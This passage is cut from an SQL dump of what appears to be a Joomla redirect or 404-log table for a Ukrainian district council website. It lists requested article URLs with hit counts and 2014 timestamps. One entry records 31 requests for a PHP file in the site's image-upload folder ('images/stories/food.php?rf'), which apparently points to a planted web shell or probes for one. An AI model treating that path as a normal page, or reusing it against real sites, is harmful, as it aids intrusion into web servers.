00:00:00',301),(2281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-19 00:44:26','0000-00-00 00:00:00',301),(2282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=58&Itemid=105&lang=ru','','','',9,0,'2014-09-19 00:44:49','0000-00-00 00:00:00',301),(2283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-19 00:49:11','0000-00-00 00:00:00',301),(2284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-19 00:49:30','0000-00-00 00:00:00',301),(2285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-19 00:50:22','0000-00-00 00:00:00',301),(2286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-19 00:50:25','0000-00-00 00:00:00',301),(2287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=ru&Itemid=0','','','',6,0,'2014-09-19 00:53:06','0000-00-00 00:00:00',301),(2288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-19 00:59:14','0000-00-00 00:00:00',301),(2289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56:--03022014-&Itemid=97&lang=uk','','','',8,0,'2014-09-19 01:04:23','0000-00-00 00:00:00',301),(2290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=ru','','','',5,0,'2014-09-19 01:07:29','0000-00-00 00:00:00',301),(2291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10&Itemid=17&lang=en','','','',6,0,'2014-09-19 01:07:30','0000-00-00 00:00:00',301),(2292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-19 01:09:55','0000-00-00 00:00:00',301),(2293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56&Itemid=97&lang=uk','','','',12,0,'2014-09-19 01:10:41','0000-00-00 00:00:00',301),(2294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-19 01:22:49','0000-00-00 00:00:00',301),(2295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=en&Itemid=0','','','',1,0,'2014-09-19 01:24:55','0000-00-00 00:00:00',301),(2296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=uk','','','',7,0,'2014-09-19 01:26:55','0000-00-00 00:00:00',301),(2297,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-19 01:29:48','0000-00-00 00:00:00',301),(2298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=ru&Itemid=','','','',10,0,'2014-09-19 01:32:05','0000-00-00 00:00:00',301),(2299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=ru','','','',6,0,'2014-09-19 01:34:50','0000-00-00 00:00:00',301),(2300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-19 01:35:31','0000-00-00 00:00:00',301),(2301,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=uk','','','',8,0,'2014-09-19 01:39:40','0000-00-00 00:00:00',301),(2302,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=uk','','','',7,0,'2014-09-19 01:39:44','0000-00-00 00:00:00',301),(2303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-19 01:58:22','0000-00-00 00:00:00',301),(2304,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=32&lang=ru','','','',27,0,'2014-09-19 02:00:10','0000-00-00 00:00:00',301),(2305,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-19 02:04:38','0000-00-00 00:00:00',301),(2306,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49&Itemid=88&lang=uk','','','',6,0,'2014-09-19 02:05:34','0000-00-00 00:00:00',301),(2307,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46:--21122012&Itemid=85&lang=ru','','','',3,0,'2014-09-19 02:05:56','0000-00-00 00:00:00',301),(2308,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-19 02:05:58','0000-00-00 00:00:00',301),(2309,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=en','','','',7,0,'2014-09-19 02:07:08','0000-00-00 00:00:00',301),(2310,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1124:2013-10-30-08-05-10&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1124%3A2013-10-30-08-05-10&lang=uk&option=com_content&view=artic','',3,0,'2014-09-19 02:07:36','0000-00-00 00:00:00',301),(2311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',21,0,'2014-09-19 02:08:16','0000-00-00 00:00:00',301),(2312,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1068:-22-&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1068:-22-&lang=uk&layout=default&option=com_content&page&print=1&t','',3,0,'2014-09-19 02:16:00','0000-00-00 00:00:00',301),(2313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:------------2010-2015-&catid=36&Itemid=70&lang=uk','','','',9,0,'2014-09-19 02:31:40','0000-00-00 00:00:00',301),(2314,'http://malyn-rayrada.org.ua/images/stories/food.php?rf','','','',31,0,'2014-09-19 02:34:46','0000-00-00 00:00:00',301),(2315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46&Itemid=85&lang=uk','','','',15,0,'2014-09-19 02:45:32','0000-00-00 00:00:00',301),(2316,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56&Itemid=97&lang=uk','','','',9,0,'2014-09-19 02:46:43','0000-00-00 00:00:00',301),(2317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 02:47:44','0000-00-00 00:00:00',301),(2318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-19 02:54:11','0000-00-00 00:00:00',301),(2319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-19 03:09:50','0000-00-00 00:00:00',301),(2320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-19 04:49:55','0000-00-00 00:00:00',301),(2321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59&Itemid=107&lang=en','','','',7,0,'2014-09-19 04:54:23','0000-00-00 00:00:00',301),(2322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59&Itemid=107&lang=en','','','',7,0,'2014-09-19 05:11:00','0000-00-00 00:00:00',301),(2323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58&Itemid=105&lang=en','','','',8,0,'2014-09-19 05:14:07','0000-00-00 00:00:00',301),(2324,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=uk&Itemid=0','','','',7,0,'2014-09-19 05:31:34','0000-00-00 00:00:00',301),(2325,'http://www.malyn-rayrada.org.ua/web/ui/page/error.html','','http://www.malyn-rayrada.org.ua/index.php%0910','',2,0,'2014-09-19 06:05:27','0000-00-00 00:00:00',301),(2326,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1122:-1-&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1122%3A-1-&lang=uk&option=com_content&view=article','',1,0,'2014-09-19 06:10:22','0000-00-00 00:00:00',301),(2327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-19 06:54:28','0000-00-00 00:00:00',301),(2328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=ru','','','',7,0,'2014-09-19 06:56:51','0000-00-00 00:00:00',301),(2329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-19 06:59:42','0000-00-00 00:00:00',301),(2330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-19 07:04:58','0000-00-00 00:00:00',301),(2331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-19 07:06:52','0000-00-00 00:00:00',301),(2332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-19 07:12:25','0000-00-00 00:00:00',301),(2333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57:--15042014-&Itemid=98&lang=ru','','','',10,0,'2014-09-19 07:21:11','0000-00-00 00:00:00',301),(2334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49:--12042013-&Itemid=88&lang=ru','','','',7,0,'2014-09-19 07:24:18','0000-00-00 00:00:00',301),(2335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&Itemid=14&lang=en','','','',15,0,'2014-09-19 07:27:09','0000-00-00 00:00:00',301),(2336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51:--19072013-&Itemid=92&lang=en','','','',8,0,'2014-09-19 07:30:55','0000-00-00 00:00:00',301),(2337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38:--19122011-&Itemid=73&lang=ru','','','',11,0,'2014-09-19 07:31:34','0000-00-00 00:00:00',301),(2338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',26,0,'2014-09-19 07:34:01','0000-00-00 00:00:00',301),(2339,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',20,0,'2014-09-19 07:37:24','0000-00-00 00:00:00',301),(2340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',15,0,'2014-09-19 07:39:52','0000-00-00 00:00:00',301),(2341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53:--25102013-&Itemid=94&lang=en','','','',11,0,'2014-09-19 07:40:47','0000-00-00 00:00:00',301),(2342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-19 07:49:13','0000-00-00 00:00:00',301),(2343,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49:--12042013-&Itemid=88&lang=uk','','','',10,0,'2014-09-19 08:11:52','0000-00-00 00:00:00',301),(2344,'http://www.malyn-rayrada.org.ua/index.php/856-vitaemo-iz-svjatom-pershogo-dzvonika_3','','','',3,0,'2014-09-19 08:15:41','0000-00-00 00:00:00',301),(2345,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-19 08:16:56','0000-00-00 00:00:00',301),(2346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-19 08:18:03','0000-00-00 00:00:00',301),(2347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51:--19072013-&Itemid=92&lang=en','','','',5,0,'2014-09-19 08:21:14','0000-00-00 00:00:00',301),(2348,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-19 08:25:44','0000-00-00 00:00:00',301),(2349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-19 08:27:29','0000-00-00 00:00:00',301),(2350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-19 08:28:29','0000-00-00 00:00:00',301),(2351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=uk','','','',6,0,'2014-09-19 08:29:25','0000-00-00 00:00:00',301),(2352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-19 08:33:02','0000-00-00 00:00:00',301),(2353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-19 08:33:50','0000-00-00 00:00:00',301),(2354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-19 08:38:26','0000-00-00 00:00:00',301),(2355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=uk','','','',10,0,'2014-09-19 08:39:44','0000-00-00 00:00:00',301),(2356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',19,0,'2014-09-19 08:42:23','0000-00-00 00:00:00',301),(2357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-19 08:42:57','0000-00-00 00:00:00',301),(2358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-19 08:50:03','0000-00-00 00:00:00',301),(2359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-19 08:50:44','0000-00-00 00:00:00',301),(2360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-19 08:51:57','0000-00-00 00:00:00',301),(2361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=uk','','','',4,0,'2014-09-19 08:52:08','0000-00-00 00:00:00',301),(2362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-09-19 08:54:00','0000-00-00 00:00:00',301),(2363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-19 08:57:20','0000-00-00 00:00:00',301),(2364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-19 09:04:23','0000-00-00 00:00:00',301),(2365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-19 09:05:15','0000-00-00 00:00:00',301),(2366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-19 09:10:06','0000-00-00 00:00:00',301),(2367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-19 09:12:26','0000-00-00 00:00:00',301),(2368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-19 09:13:15','0000-00-00 00:00:00',301),(2369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-19 09:14:21','0000-00-00 00:00:00',301),(2370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-19 09:15:21','0000-00-00 00:00:00',301),(2371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-19 09:24:08','0000-00-00 00:00:00',301),(2372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51&Itemid=92&lang=uk','','','',17,0,'2014-09-19 09:26:06','0000-00-00 00:00:00',301),(2373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32&Itemid=64&lang=en','','','',15,0,'2014-09-19 09:27:01','0000-00-00 00:00:00',301),(2374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=uk','','','',8,0,'2014-09-19 09:29:35','0000-00-00 00:00:00',301),(2375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-19 09:30:39','0000-00-00 00:00:00',301),(2376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:-2013-&catid=46&Itemid=85&lang=uk','','','',5,0,'2014-09-19 09:30:45','0000-00-00 00:00:00',301),(2377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46:--21122012&Itemid=85&lang=en','','','',2,0,'2014-09-19 09:33:11','0000-00-00 00:00:00',301),(2378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-19 09:35:06','0000-00-00 00:00:00',301),(2379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-------l-r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-19 09:36:19','0000-00-00 00:00:00',301),(2380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&Itemid=14&lang=uk','','','',20,0,'2014-09-19 09:39:02','0000-00-00 00:00:00',301),(2381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-19 09:39:03','0000-00-00 00:00:00',301),(2382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-19 09:41:28','0000-00-00 00:00:00',301),(2383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-19 09:42:28','0000-00-00 00:00:00',301),(2384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52&Itemid=93&lang=uk','','','',12,0,'2014-09-19 09:45:21','0000-00-00 00:00:00',301),(2385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-19 09:45:56','0000-00-00 00:00:00',301),(2386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-19 09:47:23','0000-00-00 00:00:00',301),(2387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-19 09:47:39','0000-00-00 00:00:00',301),(2388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-19 09:51:32','0000-00-00 00:00:00',301),(2389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-19 09:53:31','0000-00-00 00:00:00',301),(2390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=uk','','','',7,0,'2014-09-19 09:54:28','0000-00-00 00:00:00',301),(2391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-19 09:56:11','0000-00-00 00:00:00',301),(2392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-19 09:56:41','0000-00-00 00:00:00',301),(2393,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-19 09:57:23','0000-00-00 00:00:00',301),(2394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51:--19072013-&Itemid=92&lang=en','','','',8,0,'2014-09-19 09:58:38','0000-00-00 00:00:00',301),(2395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47&Itemid=86&lang=uk','','','',2,0,'2014-09-19 09:59:45','0000-00-00 00:00:00',301),(2396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-19 10:02:35','0000-00-00 00:00:00',301),(2397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-19 10:04:26','0000-00-00 00:00:00',301),(2398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51&Itemid=92&lang=ru','','','',4,0,'2014-09-19 10:05:06','0000-00-00 00:00:00',301),(2399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',27,0,'2014-09-19 10:05:11','0000-00-00 00:00:00',301),(2400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-19 10:05:20','0000-00-00 00:00:00',301),(2401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-19 10:10:13','0000-00-00 00:00:00',301),(2402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-19 10:10:44','0000-00-00 00:00:00',301),(2403,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-19 10:11:34','0000-00-00 00:00:00',301),(2404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54&Itemid=95&lang=uk','','','',11,0,'2014-09-19 10:13:34','0000-00-00 00:00:00',301),(2405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47&Itemid=86&lang=ru','','','',6,0,'2014-09-19 10:13:59','0000-00-00 00:00:00',301),(2406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-19 10:15:24','0000-00-00 00:00:00',301),(2407,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=0&lang=en','','','',10,0,'2014-09-19 10:17:17','0000-00-00 00:00:00',301),(2408,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49:--12042013-&Itemid=88&lang=en','','','',17,0,'2014-09-19 10:18:56','0000-00-00 00:00:00',301),(2409,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-19 10:20:00','0000-00-00 00:00:00',301),(2410,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-19 10:20:07','0000-00-00 00:00:00',301),(2411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51&Itemid=92&lang=uk','','','',9,0,'2014-09-19 10:27:00','0000-00-00 00:00:00',301),(2412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=uk','','','',8,0,'2014-09-19 10:28:04','0000-00-00 00:00:00',301),(2413,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-19 10:29:22','0000-00-00 00:00:00',301),(2414,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=uk','','','',3,0,'2014-09-19 10:31:31','0000-00-00 00:00:00',301),(2415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-09-19 10:33:22','0000-00-00 